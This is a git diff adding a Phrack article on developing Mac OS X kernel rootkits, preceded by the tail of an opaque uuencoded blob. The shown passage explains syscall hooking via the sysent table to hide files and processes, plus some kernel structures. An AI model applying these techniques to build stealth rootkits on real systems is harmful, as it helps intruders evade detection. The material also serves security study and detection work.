+MT1(5DNZ"X`"M(^A1:!,'E<1C844\%L>6AQ^9(@PI:DUH5S"SH(A%L)B02&Y"
+M[`M/01`:^PV:H0CB<`ZIJ6]1H#;VB[1*0%].KXQA%U3E7.F,*LO&SO",A/W!
+MN<;X?!F^T_+S.(?*$N<`1A[).6`G9F4U:3$PE:UEOIK2!<PG)BZCDBW9CV0D
+M)B.5IH&54@6S_"=TT!\3XV`E?HFU27$[R]I-FGK)%\**-2RDH.2SP0FBW-;]
+MV!;_R^<+464$G945RB/7>"I%RE4T2L))R@1`;;#0^J3@AMR^TZ41]OP8L\@0
+M2O&3"R5R(2?/_HLB^U21#*3^TO%L/P3@N'$`"]]9[HR_8/H-X%BY-UZBG2Y"
+M-(PG,2,?B%CQE$4I%)-*3)UH:L7V1"$<E1"20.;@4\!Q);[*-&4%E+.K3>K&
+M<J#7Y2^H)N`UC!KY&8^!3[H-\\,G2@U/RT0D(\*C9&A:D66E_U)=H`=)!T/8
+M-*D8F")<)+&#0O8Z*&U(@V21HY'W1"WI.F).QG>D'/!'Q:R:_+1RG\(UQ82R
+M;PHE`&_2V],A3==UVEL`-K,+(T/;8']A_ZMWU]K4U+DZB+WH&6=\T=1?E-KU
+M<?6*#4!*.*6=;O<`N=,&GIE0L`JJ,(H1J'/].M<0TO?W1K%?=)]1OJ(Y:*.&
+M]*FMC"]M&:K?4U].!CL1]Z138,(9]I!<Z:YC>525^3A]]=$2_^1`(:'LL+4V
+MB4B@4CU(,J53*=(G0.U@V.594VZ:6/&E:>*&(M-\^593$CZ?>1Y*5\>@1779
+M3`,9Y":@[A7"/DCG3>597\_&;2C"F\K7[75%:B>7VNZ\)G"9UI59:[TN$RQ`
+M6+'2>GU)="!8)*"B/("JKM"1%#?3W3;M!NXQ@[]$53:G0Q(69%$ZNE\B7=3#
+M&EIMP@$GVA2:%S(#_>4N>Q=:=YR=\$_L5S]T1R]>`HCI0Q1C8&B'W(JY*3;(
+MF6(OC2Z;EF`E3(%P"JZ(P)Z.'Z)\HAFJNJH/XV^H$]XFC?:8`P)7NW3:1NZS
+M0Y])@!=`./__>(_-'_E9:OT_L,+8L=PU7+G\%$+&8EL!GMK_"__2]?\6KO_#
+M[_/^W^_R?/WU_V^W$C^@M6LFM9`E6DA3+G(IN;2:&X+7[$\?66(6FUI48MZZ
+MJ*G&,X'R5&',3#:6YA33.<1J:R6J7%N14YC0H8K"Q-31Q"B3J/@%#;PN,%T7
+M<0!DX.S&QRO\$GN#P?KJE&ZPGUB[1Y9:31<2;8DQ))\I]74(]:[<VSI*O1TK
+M!N,%!NY>S+*)W:UJ$D_RJRR:F"%I"<Y$/I+2M((`74VJAJ1"SP/[CB1A]L>4
+MYO7.59K]*IF<4A2^N&))4Q0($W6,9)8MH4EDH`7>?-U@KPD_;DP@H>!N8D3\
+M-BL'P**VH680+,&SE#,9O81GX2PHIVWF%71&Z`64+#I-=>4TU1.GJ5YTFNH5
+M3A,J84E]R?PB<N/9[/YW/TO9_Y$_NW;Y&FGT$KL`G[+_&_+\C]C_V0'[WVUM
+M=)_M__=X_H3V'S?(V3Z^WC.AD6)!0&Q86\0/6,3D[Q-D-`"E]<5O;_*I*/&#
+MIM:[`1:SG!K"[C]FS_-P\W:,Z6,GC&(C;\^JS=5<8P@U;\`>+01$3@K0>IN:
+M]Z;V:Z?B<YB8_9%\27^F5I-LT3H5);*-#L;##?:F1R$S_,&WSB9^PM`!KZTN
+MI'9;;WI76K5\E?J0A-M"FHH`X3\YZ#8!M$<<)Z%137OB@^KJ.3J%@T!\Y)V>
+M&N)YA?OL4"P"0,3Y"*WV3'SK&QUQ[DOF3B!L=X4PHW3:5\DX3X0H]&CMK,]#
+MJ6_G^BK?R4.)J9^`?$M=#C)_9!<>;E95VVYG4;']L(P`T4RT*H'Z[.0\\2QE
+M_W&*:"WVUW"":(T."'^-^']C8Z-3./_1Q>QG^_\=GC^3_1_2AO1WH35Z&>56
+MBQGJ(K,GW+Z-Y![V:.+/W!&+@;P;VF8?6)YC-S1?4&2-_F[9.*;(`X:T@X1(
+M]6^!ID]XP/.:$US@)/9AW/FF$PPH[*%_`;P<`<KOZFN4!2EG%IZ:,$!1+>9^
+M/#:=`-H%!,AV,*HF%YZ(LRNS*<CO=)<C)%$*H01EDC"]:FH!DA\A26;?VQN"
+M)"$Y3QP$KIRBQRT?[<.3@].C_NZ'EQF(A3EZ`3F=HU=PTVGZ)$5L2X/635:6
+MI8>`/RB?U&G"D]"T*RV>!H\0F0(K.HJHPOF5,I3O&OXQZ-BPFDM)0324OR38
+M>97)R?)'!!E&U@W*[1HI%56[=0K$@N<B"C1Q51C/KB22PA0#5YGE\E:&KV%V
+MX,CJ"/MD17*L>$$=Y\?LJDB*Z>.C2*\>=[@K'>TG.D76GR/7^G'H2^JW@$Z5
+M_E,S6X5Q\WE>:]EG,?\O*44S[<O>"O.X_]?I=CK)^=_61H?.?_8VGL]_?I='
+MW/^2'&9,FAQ2_U`7PR#$U=55MG_*3DZ'[&+09\-?#@?L^'3_XJC/3D_8+CL[
+MAX_A(;P/?AL,^\=8H7BGC(L'2->KKHP1.>)L9E4.^F#Y=(_'Z[CCI9P*_T&E
+MVRHPT2W:C&H$?NR,'ZJR'H%W&T_`.H^JLN[DQJ2*K#BNQ#.=TITY/](Y7<Y*
+M9PO%R<+==WL@]'*I](AAJSHS.6C8GI,OCAMVJG/5H<.-N=ET]+!;G9T<0-Q\
+M)%\<0^S-H[YP&''KJ7*"V]=/%2.NWSQ52AU/;,\1[OG%B?EA^`N0ME]K5PB8
+M-E"=02.^>8-W&N'1#29V);'L#45T`1#MR-LNIF)P4TH,K-%V<@,0N%C;VF>P
+M[E8,/>QZ!DZCJ>NF&8!IX2/3I"MP4MQJZQQ+[Q"2-PCE<=`^]&PJ^E:X"[U4
+M4NP37XX&FCLNB0"=IJ7@"&=I'J"<A&ITK,O^V+U:%H,-H5()PRB*2X*(0OO+
+MFR793%C&56J*Q2A8`+]2V/?](>KSF1X8-5W7Z;ZM52/`;7UJUUM6>3$8R)`N
+M]H&B/HFTZ);B%;8*XR[>%.2,@!KX"^\"LKA0*R>H[)U?,;OCX;4?@5+*-`48
+M!GZVBO;2Q-=B]BTTEFE;-ABZ51(IOB:%]OL'AR=]\_ABV+_4"0:U+PCFWLAC
+MQXV!@BE3#/12(%9X(Z[>*K*^JK9HZ^4L`R_*VL8Y`D)E0M>[U?]2PB]S9]Z<
+M?*TF[9%)%QQ$L9Z(H2&V>J_]#.).WD'<N'T0`*=2,2EV2"0CRY8O7I*B(*93
+M6=!=9`16R.CW!DM:,[E\#=[5_6LB$\_M;L_3#)FJ-G"R5<^=;%?)-[B-T_38
+M`C#R?36.;G.JA-LBZ63PX&QWKZ]+>DC^``3W9Z;B$),G&7EDSO+(Z\&H3NYZ
+M,(R5;FGWO=D_/V?UE>BM.A(%879R05E"O+CQRC3',\^&7K>MI;?+T15B(`D\
+M)"/6,6ZO==K"62;D!>1A&'CC`Q9_%I-&N).$W;.+H4[M3RU$K2,R]D]/^@V6
+MR@$JK?U,$C=I7,$5&`2&#95`V]\=[NI04MY<ACLC,5_>-I8`(YF2KN%)+>K@
+ME"!XDKT?$\24ANCVE"`WQ7*Z8P_:$!M&]#531+&%'@A\W<8-5A?S>F::7T\$
+M=#C`!M$!6.$*/S(V)%N4X;82^8FX:5"*`EIP%N)^:X0E95VL"&)_^VA_`AJ-
+M4@\"?LSL4;"*KM!@53TA2<U:;1S8@DS_DD-I14$23]HW@#8A],H!O6J@5Z"H
+MH==7V>7EY5MFTQ3O-8=_>,V<F*;E%%P$U@U7'<`/V82'G(T</)*`77A=7<,G
+M/61=$%1U#U^N]0H7YZ6UTAV[C:+6-N98K5PM8+FZ&!W@""I@)`)1$E%3F\0^
+MV>XHX+8S=M`>BSD_7#B/0!Q<3H&+4W&.!WTX9')T6]=J508D:4F#/4HOLB5'
+M?>&*(9R<7V`DIQF1,^B?-+,JWFD0,-3]D-+P&H61#N=%Q5"G`*W,&CBGZ-X;
+MZ5;LUOV*>YD;[L1>_#E($ULEJ"8:,N9&'?+=>T?=KTD#6V;THC%.W'Z8Z,1=
+MYH;">=U0G&/\LDY(;FO:!1>3&"&D&3_WTLB+1XJ#)@O)1HG"R@'+9W^NO!95
+M\:6.2WX18]*/7I(SB5*RUJ!9S<Y]`P]GS&4SJQ'VQ]:5RDNLM`1:(0)5M%SM
+M2<G0,<POE0SZ_\M+!E'F)`-]9;YHP)G/]14\)IKE,!FX"G+!>JR05JH\IR?(
+M6?PO%$P:KSQIDC)%_WVCE`#+W.SZ)S8I*3M"_:L,049^BYL"Y=RU%Q[:<ZLZ
+M7T-UA>(R,)1)%@M\0$TWG,F+V2((2'EJ`Z$6+GYE25E.Y;WO9$>29<'G_O/<
+M?]+^DRX4?[T>-*<#J1L$*SM/2L<?J_N0Z,P)OY<D!*5[V^6G(P)3]>F/QS*A
+M?+EYSM\5J08+DONH<PV%J[#[LVF06RO'Y2BZ.E'<>4V-1'&X8$&C#7RZH(AV
+M*6+@RIQ7K\2<`(6?#OO7O]@+*+2"*_DB@W(<VH&H2*FKJ[)K-63IU0YSMK5,
+M]DJK.\(;MR&3Y@H^:ZF^U<'C[ER*Z[@_.E>Y2\@3R)]S4UD4+4,(QIT[3H=2
+M%QZLA+.#IQ3#D$X)H^@W.L@Z?F8T`$>@M4)_2NX%R(UD!-NF.T-D]"UO$-$+
+M98SR/$1Z>?]/<_KN_/D9T`P_%'M\\?]'`.\6FCLMP];:4JZ(#V"O_3SG]/UR
+M",5VIT]A,M5/X=,ET4$*DAL5)%*B*^TR-EZ1(/O8?')11C]3L>4(Q-HLK5RF
+M;!EJ(F#7GDB*Z.P_$6-;4<7BU=M,#R@,JGB;`!:9WVPU.3"+L1J^KT-NX:1@
+M!;+L?0(Y>>U4F-`TW"<IE.9QL.>059\3M">3ZGA3A/$D:;@BM2AAM"&]0):(
+M:ZN)$G'KLB2)Q;\%:1).08$H%9164J6"SB\@:^_LM\7)`N>B3!9%A//(HHAO
+M6;*RUT0\35?&;\F1]G_M77MSVS82OW^M3\%HFD32R19?(J6X[=1QG-93)\[$
+MN=Y=DXZ&DBA%9[V&E)WX;O+=;W?Q)$%*<N)SKXTPTZ01E\`"6(`+[&]WY:&L
+MD+>,)O,9[*&M]2X89'KO7;.8-_8^V4`EU_(Z(K&LUM%P,V\QF6;CI:$#;>S-
+M^;-STKJT[@SC470U76W8RJ*Y=36_G"\^S/F&UI1;<='6IC9;4\');+^2CT_*
+MF`,?;D/]RN@#=+-MZ@/ZE[_<2(.Z0,(LJS(W#KS,/S]9*XS-/\[,8,&T!HR3
+MR^_C21IK.8U"?N5)&:FC=J7J_S:G?^B!94BY2G13T-'9Z8\O<_7+=A/VQ1-5
+MLXKXH8K_=E@1/,*(P.^F4L570EWH?<)6!U.L+1-XF^ET%H:_PYC<-<,:\PAY
+M[CWO'1W_O+8N6VF'\&-O>36=LJ<)[]RG=5-?.NWK;92F]+`)W&"[S*JD#%EM
+M9>!M]!.="*3PP61>1U-AG9+&3I0?/B#L`J''@+*U1X37GN.*,H.3YP`9I-;H
+MG6F2/MHD>%./P9O$*5AK^19V0/2AYGSR>.IK%,Z3TY>_')WQQ2O-25E;)>\E
+M-X#M`Q7]7BTZ$S.SKH@A0SP?2OU05'Z+SB3Q>(+!39`=BU[?MC/F1IA!O>T3
+M[,V:+J)A/)1)A&3\,A0`8P?K]3`;4TY\*$&3%)^<@"0,%*=F,F<5QS!NR>)&
+M#4Z]^.A8Q#K*O,8\\,K`;$R@31D'&DY`+)N]``(F?[VST^.3EQ<GM>H&T)YS
+M8%?56T=_>_/3^>O,2V=GQ]:W"!.,DL'['U+Y`%VWOL=7?V\\Y-=6ML/_OH@N
+MXQ$LP<]K8X/_E^U[#N)_$?8;AB'B?QW/;N_PO_=1%OU_[<_PZB<+\5Y4*G!V
+M!`5R!C-O[1];K>FDS\&Q:>N;6HKQGV#'B6;P-*FW^E>3Z=!Z\=TWM5=_?U;G
+M&4Y2]&Z*HSE4D\R`#+[M!POX[Q+_6&!(-.N@P?Y:S98].#NGE!FF<0#O'PSD
+M6R\8)G<6)<!D*OZ9WLSP#='6P2(9HC\5[H'08'HU7,`G/H6GN:Y=+BILIQ14
+MR<P@JGPU[@-%^5\'T?P.L[]N]O_T/5_F?VWC^H<__5W\AWLIN_ROV^9_Y9?_
+MH$WW9M%'O)I16M[ST[,3JZ$!25>+%>J+E3TT"(P6T/%:M;5,%H,6O#>9CQ:@
+MLE83"1@KR?M)+U9UE=;FRNP(%^FH-H):7L2S-]C:$XO*PROK\BG4_HA8H$R9
+M+,[>2!BE6(!&>JR2GA;#%K`5X>^W/LUM,S>V_0C-4__)@X)9+MKE80[+30IN
+M/)2Z;CP4AZVE`2"2^6S-5+B%=$:"7!SPQA)'7*0J98=;$[:-.$&\@_EK'L,$
+MS>W33=1>.6_L+H3L,;Q/O!V9F=1ZOH!%(R60>:)./_*<JO+*F_M%-I:L1FV$
+MV!WS)VF:V9#0U\IG],T<<D<:CO\CPSF"G.-OXD>0`L/FA>8?BK1!QMCH(W"E
+MKQ")B(0?2O+\'D?SQW3$3B;Q=6PMW]^DDP&()KR^2&ZH/P_>S;=,?GL!`CO/
+MV-,6(U$3.6.WAO$UKD&1_A7Y8G;-RAZLAM,1RU2&!\ZT27G*6'ZS]QAE,YY'
+M?3R'XHX#YUM1%T+H;A!#QPYY5!':0H>S.!T+3W3XZP,<OV<QU(\S,KF,J:DG
+M1/XJ68R3:&:IW.OHNLYQO(,!XO1D:_UX]2&&G1334>U_#YLU[)Q[=`5(R1CX
+M9L.IH8OGO=?/SE^>_5-N-D-8*W9VIU$;3>D0\X5&H@$5R`FERRB4#?0I1H`Z
+MQI)])+<'D$7FLZL:E:TB>35W%<NND;1]Q[QM9)77>*86DLLF$UFJBW$(2X$+
+MK#1(L6UPR#C1.D\/,N?]/WG27ZT4Z'_H6(,KY*[4OXWZG\W]/U'_"T('];_`
+M#7?ZWWV4G?ZWT_^X_J?T`OR?*!DC$(>V7/0VNM8!,3``36L<+9G-):/*30[S
+M.E^CL5PE*0X&>P,5%]N&IFO8MF*!1@*;A?W990-1K%#D-(HO4RF*/WCL,]1J
+MP%?X!K_![R>@Y4YF$Q:$*OT0+9G-#1F$+XT'O9##P4TJBO]HM9A@QZ[?.K_5
+M"_I-"LR*0IYQ>WX-7VSQ*O&50JVN49>N0?1VD0BQ"C=\VKEI'&NA:_I;-*]4
+MKU_ALU&L>644K3Q\*=N6AF1";MY.?E.#(DBX`,CG>K<+^YU3+O(,]]%4Q.!6
+MH'IS[IML(3&0'&^*U''&A9!^X%S,HCZ*2(P#J5C^=)NNZ]U[D.T>YUT$[]!X
+M/]!99?TF&(;^RR?.B/C]Z]1Y=D65HON_"%-T_SL&>2830.M+VUB?_YT*U_]<
+M._1=T/]"S['_8K7OHH.;RE>N_VTS_X@6/%A]7'UN&YOB__H!L_\$KMMN!QC_
+MS[']7?S_>RDON$K$YCQ:B33VJ;"$5RJ@5+Y$.\^>!<H^^?3M6><4H`X>[6]7
+ML!)4X\B+E9PS]\Y_/H"*8M]V**\VTUXE_-]M!W5)$WANK&@DB>UW=!K/,6GP
+M:BI#XYLT':?K9FA"22-(/#<,LFWU-9XMF0W&<R5-&PY17=LW:0)?Z[O?'Q31
+M=`-5C^O9?5_1Z(EG%(WKC#HF#0RB:@O7E&W2M!U7XR?J=A2-;`K55=F6XX6^
+M28.3H?$3PA@:-!1<3O'3'A30X&1H_'1=I-%%\/AF,,6P?==C)'F>P,^W$T,L
+M?5!X8-WC?@<]"[NLL>%PT!]4\A0TT(ZG:$+;H*&!=CU/T/2''8/&<VV@Z822
+MIF.VY76`'1!`2>.;;?DXT*'G.[*U:.0;5#2MON(ZBDR.VB%P[7=5/6V3H\`'
+MKMN*H\@Q.0IMX+JMZND.3'Y@_0#7OJ()37XZN'P"-4)=U^2G@R(4JGYU8I.?
+M;@`\AQU%T^7\:)-*(MUIVY+&[U0JY9NAQ-;\V13D;;[_7X;^V(S_\%R???_M
+M=N![^/VW0U`)=M__>R@2_Z'-^A\=`O)[C^D?J6RS_@W1N*5E8/WZ=URO[6?/
+M?Z#R^#O\U[V4_^?[_[N,U;@V[.&:0(DI[$I3(\9C)EIBQL)`%^9LF^KA1:+U
+MG?7X'X\/,[#AQC*)KT>HN1X6!XN(,5)XKQ\-J8J\`72I82WPQGTN8T$LW\[I
+MPC#[1EWGI\AE&*\*JT^1V8=75HW2-Y)W9YV9S'F,8W9!.DGQ:EWL",,'`J4P
+M;UK8.OS)_):9]X.!*LDP3@';Z31(K*5&1\>YG@JWW+S!81NGV.48+T'S[BGD
+M%(M#EG=1K.(5^<FS`^L==IM=K8ZY)28[.\CEI"[O_;4J\!23>UW>MDZ*W6%H
+M,,3H*OM2?F"`JFDU%E.&F,'C=)';,1ZXT9@;#ZG>6D$D+_Q=AO)B@;\8UAXK
+MAOHQEA:0'"H;`36M"533>G7TXTGOXO17,B?(`WXM'_:'FEK+;Z^7N2*X-;\T
+MS5@YS"?PG@]1UFI8K_`I!V00HJ./0`HIS633,<'V5O[NXMV*#`N&_++!T<>#
+MQ^G*#)Y]VR%3SD1ZCY]D63TZ.WG]QJH^-\._,1&@RH35RUR?2@2O12(;(84Y
+MHVE^#6IP,":1++HEZH5O`_\W,[*#%M;A`4)#UHL?0WGI81XRPE?@Y5_92^?<
+M3H),2!@*_@-3QCM-JRIX>3B]JE=E+<2S3HW6I\?O;-B_B\7BH1.D*`U-ZFZA
+M3!#+(G#.ETTD>6T+SNO;S.7EY\ZE@?,JFUKXE,6SY:HWG*2(C2+[+'XON<-+
+M38OL<:GFGT45/'IS_N+T>"M9V#3_NJQ<9F3AR]O&D!<XJ^@D=W8*,S_&G>,J
+M)?4FQ>,/2]?1M!;P2_)ADF*V+OQ,4MX/W%.P#63Q`?&8WY@VBZNX'0-QO4MI
+MI;ZEEY.E10G!1,LB(`=/WH##N5PE%J:.7,%V&8TPV![S^Z;>4="%[_2W&\@?
+MX2[-G]>O$&`(U<L5#:X6MXY"C:`C+V^OH&)LKX"-7(08WA"/GZB)BA1EAO(C
+M269NA)HLKUG!6[Q\BV5^N>4REU=:-1'U%,>45K7$9_*EVFKEAD*'YT$+#0S)
+MBZZT'&)7)TS,,(Z&<$3SV0`QM14>]'IXWE]-YCWZI<>C"=9LMNA(<M1D\!&F
+M2#[TZ'N&P%/<,[8W:8SH^&WTN$PKS,%0!G1Q_!:1JGFH[_48F8:_>%B7O#89
+M:+HDKX:`":@5L'\S7(IB30`5RJAA7<M'2(=M@TCKOVG>TS5\W+*">OGTT\%<
+M*8QJGW;M3(=I;)HR3K86K1966OH6^<1>8GX]RJU':?4\%Z3%Z\!O/B:):3LN
+M_!$&F(;/1NT_M.%1&&!>74S.U\%\?-W`9OGXH">:#V-57.6#8IRYRX=_TV4^
+MB#O46-WZ2E]X:AK@"BYZO&=U&#_AG<IPHQQP4=G#_F[>@M7=\4.^!].`<6#%
+MNKUXZ\UX3X;,S,IYKBT9GN=*.UVP5^&4(=9H!AE=$I&'NS_G[W=R'M`F^QN-
+MAF)25./ZM',K(OPO,R-^[I3#MX+`TQ,.VJ;/+4=NBS[U")^=6O$$O\T65U.&
+M]!Y(S'RQLCXLDDL><`GV7`ZE+CB-B3:Y!L9[S$\36!$V?:#>-A1IM&D>ECV4
+M1X*6NP71%B2-;>II='3T^Z7>,SQ[3Q%X/IXN^M'4NC@[>MJ[.'EY<?KF])<3
+M-O"4ZFP:8W;&&/T%%NF*W_ND,4NB1F.BCZFADGJ*3^-9X)<_ZP;ESV#K*G^H
+M3X/Q$/:V-=5RJ%=)O6B/+GUJ3ETY"9NZ_-JM[.5V>Q.]5>"<;BSNK'_Z;19W
+MSL$\HY/HKN:%^TG.V[R0K2*'\_.+LP*7\K,H`1Y_FHS?IS-4EZ1/.:YBY58.
+M>OC*$J[E.[M`0=D6_P/Z\F=#@#;A?T*[+?`_@>TXB/]IMW?W__=2\NOP"3>F
+M65-^0?]X<\B'Q]8JHD"0[*ASL,:._K\&%8E;6P*8N,-28)%&%]CH0E4"+LK2
+M>:4`HRQ=4`HRRM)U2X%&63J]'UFPD49'@".W!'"DTSE^,!J4@(YT.M#ZAP6@
+M(L+#9-IUNGX9^"@['QVG#("DT]G#42D(2:>+O&!0!D3*M-ONEH*1,G3AJ!20
+ME*'KV/<`2NJ&?-#:Y:`DQ-1PFE)0$H?E`$TI*,EK^Y*F#)3D.XJF#)3D=V1;
+MI9"DMJ]HRB!)`1)RFC)(4A#:DJ8,DA1ZCJ`IAR2I<2Z%)'4"R4\I)*GK2II2
+M2%*70Y*0I@R2Y-AM5=%7BDG:E5W9E5W9E5W9E5W9E5W9E5W9E;LO_P4A):,A
+$`,@`````
+`
+end
+
+--------[ EOF
diff --git a/phrack66/16.txt b/phrack66/16.txt
new file mode 100644
index 0000000..4f988a0
--- /dev/null
+++ b/phrack66/16.txt
@@ -0,0 +1,2125 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x10 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=----------------=[ Developing Mac OSX kernel rootkits  ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[    By wowie <wowie@hack.se> &        ]=--------------=|
+|=---------------=[       ghalen@hack.se                 ]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    #hack.se                          ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+
+-[ Content
+
+1 - Introduction
+  1.1 - Background
+  1.2 - Rootkit basics
+  1.3 - Syscall basics
+  1.4 - Userspace and kernelspace
+2 - Introducing the XNU kernel
+  2.1 - OS X kernel rootkit history
+  2.2 - Finding the syscall entry table
+  2.3 - Opaque kernel structures
+  2.4 - The I/O Kit Framework
+3 - Kernel development on Mac OS X
+  3.1 - Kernel version dependence
+4 - Your first OS X kernel rootkit
+  4.1 - Replacement of a simple syscall
+  4.2 - Hiding processes 
+  4.3 - Hiding files
+  4.4 - Hiding a kernel extension
+  4.5 - Running userspace programs from kernelspace
+  4.6 - Controlling your rootkit from userspace
+5 - Runtime kernel patching using the Mach APIs
+  5.1 - System call hijacking
+  5.2 - Direct Kernel Object Manipulation
+6 - Detection
+  6.1 - Detecting hooked system calls on Mac OS X
+7 - Summary
+8 - References
+9 - Code
+
+--[ 1 - Introduction
+
+-[ 1.1 - Background
+
+Rootkits for different operating systems have been around for many years.
+Linux, Windows, and the different *BSD-flavors have all had their fair
+share of rootkits. Kernel rootkits are just a continuation of the standard
+file-swapping rootkits of days past. The dawn of tools like Osiris and
+Tripwire forced coders seeking to subvert the operating system to take
+refuge in kernelspace.
+
+The basic idea of a rootkit is to change the behavior and output of
+standard commands and tools to hide the presence of backdoors, sniffers
+and other types of malicious code. And just as within other parts of the
+security industry it is a continuing arms race between those who seek to
+subvert the kernel and those who seek to protect it.
+
+In this article we will describe the basics of runtime kernel patching and
+kernel rootkits for the Mac OS X operating system and how to develop your
+own. It is intended as an entry level tutorial for beginners and as well
+as guide for those interested in adapting existing kernel rootkits from
+other operating systems to Mac OS X. Apple supports two CPU architectures
+for the Mac OS X operating system: Intel and PowerPC. We believe that this
+guide is architecture neutral and that most of the source code is
+compatible with both architectures. 
+
+-[ 1.2 - Rootkit basics
+
+The purpose of a rootkit is to hide the presence of an intruder and his
+tools. In order to do this the most common features of a kernel rootkit is
+the ability to hide files, processes and network sockets. More advanced
+rootkits sometimes provide backdoors and keyboard sniffers.
+
+When a program such as '/bin/ls' is run to lists the files and folders of
+a directory it calls a function in the kernel called a syscall. The
+syscall is invoked from userland and transfers control from the userland
+process to the kernelspace function getdirentries(). The getdirentries()
+function returns a list of files for the specified directory to the
+userland process that in return displays the list to the user.
+
+In order to hide the presence of a specific file the data returned from
+the getdirentires() syscall needs to be modified and the entry for the
+file deleted before returning the data to the user. This can be
+accomplished in a number of different ways; one way is to modify the
+filesystem processing layer (VFS) and another is to directly modify the
+getdirentires() function.  In this brief introduction we will take the
+easy route and modify the getdirentries() function.
+
+-[ 1.3 - Syscall basics
+
+When a userland process needs to call a kernel function it invokes a
+syscall. A syscall is an API function that provides access to services
+provided by the kernel such as reading or writing to files, listing files
+in directories or opening and closing network sockets. Each syscall has a
+number, and all syscalls are invoked referencing this syscall number.
+
+When a userland process wants to invoke a kernel function it is almost
+always done through a wrapper function in the libc-library that in turn
+generates a software interrupt that transfers control from the userland
+process in to the kernel. The kernel stores a list of all available
+syscall functions in a table called the sysentry table, each entry has a
+function pointer to the location of the function for that syscall number.
+
+The kernel looks up the syscall that the userland process wants to call in
+the syscall entry table and invokes that function to handle the request.
+A list of the available syscalls as well as their numbers can be found in
+/usr/include/sys/syscall.h. For example, syscalls of interest to a rootkit
+wanting to hide files are: 
+
+196 - SYS_getdirentries
+222 - SYS_getdirentriesattr 
+344 - SYS_getdirentries64 
+
+Each of these entries in the table points to the function in the kernel
+responsible for returning a list of files. SYS_getdirentries is an older
+version of the function, SYS_getdirentriesattr is a similar version of
+with support for OS X specific attributes. SYS_getdirentries64 is a newer
+version that supports longer filenames. SYS_getdirentries is used by for
+example bash, SYS_getdirentries64 is used by the ls command and
+SYS_getdirentriesattr is used by pure OS X-integrated applications like
+the Finder. Each of these functions needs to be replaced in order to
+provide a seamless 'experience' for the end-user.
+
+In order to modify the output of the function a wrapper function needs to
+be created that can replace the original function. The wrapper function
+will first call the original function, search the output and do the
+required censoring before returning the sanitized data to the userland
+process.
+
+-[ 1.4 - Userspace and Kernelspace
+
+The kernel runs in a separate memory space that is private to the kernel
+in the same way as each user process has it's own private memory. This
+means that is is not possible to just read and write freely memory from
+the kernel. Whenever the kernel needs to modify memory in user-space, for
+instance copy data to or from userspace, specific routines and protocols
+needs to followed. A number of help functions are provided for this
+specific task, most notably copyin(9) and copyout(9). More information
+about these functions can be found in the manpages for copy(9) and
+store(9).
+
+--[ 2 - Introducing the XNU kernel
+
+XNU, the Mac OS X kernel and it's core is based on the Mach micro kernel
+and FreeBSD 5. The Mach layer is responsible for kernel threads,
+processes, pre-emptive multitasking, message-passing, virtual memory
+management and console i/o. Above the Mach layer is the BSD layer that
+supplies the POSIX API, networking and filesystems amongst other things.
+The XNU kernel also has an object oriented device driver framework known
+as the I/O Kit. This mashup of different technologies provide several
+different ways to accomplish the same task; to modify the running kernel.
+Another interesting choice in the design of the XNU kernel is that both
+the kernel- and userland has their own 4gb address space.
+
+
+-[ 2.1 - OS X kernel rootkit history
+
+One of the first publicly released Mac OS X kernel rootkits were WeaponX
+[9] which is developed by nemo [5] and was released in November 2004. It
+is based on the same kernel extension (loadable kernel module) technique
+that most kernel rootkits use and provides the expected basic
+functionality of a kernel rootkit. WeaponX [9] does however not work on
+newer versions of the Mac OS X operating system due to major kernel
+changes.
+
+In the latest few releases of Mac OS X Apple has done a couple things
+hardening the kernel and making it more difficult to subvert. Of
+particular interest is the fact that it no longer exports the sysentry
+table and that several of the key kernel structures are opaque and hidden
+from kernel developers.
+
+-[ 2.2 - Finding the syscall entry table
+
+As of OS X version 10.4 the sysentry table is no longer an exported symbol
+from the kernel. This means that the compiler will not be able to
+automatically identify the position in memory where the sysentry table is
+stored. This can either be solved by searching the memory for an
+appropriate looking table or using something else as a reference. Landon
+Fuller identified that the exported symbol nsysent (the number of entries
+in the sysentry table) is stored in close proximity to the sysentry table.
+He also wrote a small routine that finds the sysentry table and returns a
+pointer to it that can be used to manipulate the table as one see fit [1].
+
+The sysent structure is defined like this:
+
+struct sysent {
+        int16_t         sy_narg;                /* number of arguments */
+        int8_t          reserved;               /* unused value */
+        int8_t          sy_flags;               /* call flags */
+        sy_call_t       *sy_call;               /* implementing function */
+        sy_munge_t      *sy_arg_munge32;/* munge system call arguments for
+32-bit processes */
+        sy_munge_t      *sy_arg_munge64;/* munge system call arguments for
+64-bit processes */
+        int32_t         sy_return_type; /* return type */
+        uint16_t        sy_arg_bytes;   /* The size of all arguments for
+32-bit system calls, in bytes */
+}  *_sysent;
+
+
+The most interesting part of the structure is the "sy_call" pointer, which
+is a pointer to the actual syscall handler function. Thats the function we
+want our rootkit to hook. Hooking the function is as easy as changing the
+value of the pointer to point at our own function somewhere in memory.
+
+-[ 2.3 - Opaque kernel structures
+
+With OS X version 10.4 Apple also changed the kernel structure in order to
+provide a more stable kernel API. This was done to ensure that kernel
+extensions doesn't break when internal kernel structures change. This
+involves hiding large parts of the internal structures behind API:s and
+only exporting chosen parts of the structures to developers.
+
+A good example of this is the process structure called "proc". Which is
+available from both userland and kernelland. The userland version is
+defined in /usr/include/sys/proc.h and looks like this:
+
+struct extern_proc {
+        union {
+                struct {
+                        struct  proc *__p_forw; /* Doubly-linked run/sleep queue. */
+                        struct  proc *__p_back;
+                } p_st1;
+                struct timeval __p_starttime;   /* process start time */
+        } p_un;
+#define p_forw p_un.p_st1.__p_forw
+#define p_back p_un.p_st1.__p_back
+#define p_starttime p_un.__p_starttime
+        struct  vmspace *p_vmspace;     /* Address space. */
+        struct  sigacts *p_sigacts;     /* Signal actions, state (PROC ONLY). */
+        int     p_flag;                 /* P_* flags. */
+        char    p_stat;                 /* S* process status. */
+        pid_t   p_pid;                  /* Process identifier. */
+        pid_t   p_oppid;         /* Save parent pid during ptrace. XXX */
+        int     p_dupfd;         /* Sideways return value from fdopen. XXX */
+        /* Mach related  */
+        caddr_t user_stack;     /* where user stack was allocated */
+        void    *exit_thread;   /* XXX Which thread is exiting? */
+        int             p_debugger;             /* allow to debug */
+        boolean_t       sigwait;        /* indication to suspend */
+        /* scheduling */
+        u_int   p_estcpu;        /* Time averaged value of p_cpticks. */
+        int     p_cpticks;       /* Ticks of cpu time. */
